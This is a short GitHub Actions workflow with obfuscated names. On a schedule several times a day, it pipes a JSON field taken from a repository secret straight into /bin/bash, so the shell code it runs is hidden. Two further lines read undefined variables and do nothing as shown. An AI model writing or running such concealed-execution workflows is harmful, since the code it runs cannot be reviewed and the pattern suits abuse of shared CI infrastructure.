name: wangpinru6718
on:
  workflow_dispatch:
  schedule:
    - cron: '9 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wangpinru6718
        env:
          fhuip2: ${{ secrets.fhuip2 }}
        run: |
          echo $fhuip2 | jq -r .a793 | /bin/bash
          echo $go7 | jq -r .bo36916 | /bin/bash
          echo $du78 | jq -r .zmn55 | /bin/bash

